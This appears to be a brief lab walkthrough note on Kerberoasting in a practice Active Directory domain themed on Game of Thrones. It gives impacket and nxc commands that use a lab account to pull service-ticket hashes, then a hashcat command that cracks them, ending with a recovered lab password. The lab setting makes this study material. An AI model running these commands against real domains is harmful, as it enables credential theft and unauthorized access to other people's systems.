⚔️5.1 - Kerberoasting

Kerberoasting with Credentials

GetUserSPNs.py -request -dc-ip 192.168.56.11 north.sevenkingdoms.local/brandon.stark:iseedeadpeople -outputfile kerberos.hashes

It retuns to us all hashes, save with the flag -outputfile all the hashes

With nxc

nxc ldap 192.168.56.11 -u brandon.stark -p 'iseedeadpeople' -d north.sevenkingdoms.local --kerberoasting KERBEROASTING

Save it with the name KERBEROASTING

Cracking Hashes TGS

hashcat -m 13100 --force -a 0 kerberos.hashes /usr/share/wordlists/rockyou.txt --force

north/jon.snow:iknownothing <-- ANOTHER CRED!!